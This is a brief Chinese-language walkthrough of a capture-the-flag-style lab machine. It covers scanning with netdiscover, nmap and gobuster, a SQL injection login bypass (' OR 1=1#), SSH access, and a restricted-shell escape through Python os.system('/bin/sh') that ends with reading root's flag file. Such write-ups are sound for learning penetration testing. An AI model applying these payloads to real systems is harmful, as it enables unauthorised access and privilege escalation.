知识点
- sql注入
- 获取非受限的shell
主机发现
netdiscover
端口扫描
nmap -p- --min-rate=1000 192.168.80.5 >port
ports=$(cat port | awk -F " " '{print $1}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/[^0-9]*//')
nmap -sC -sV -T4 -p $ports 192.168.80.5 -oA nmap/nmap
信息收集
gobuster dir -u http://192.168.80.5 -w /usr/share/wordlists/dirb/big.txt -t50 -o dir.out
john
' OR 1=1#
提权
ssh robert@192.168.80.5
- 获取非受限的shell
echo python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
cd /root
cat congrats.txt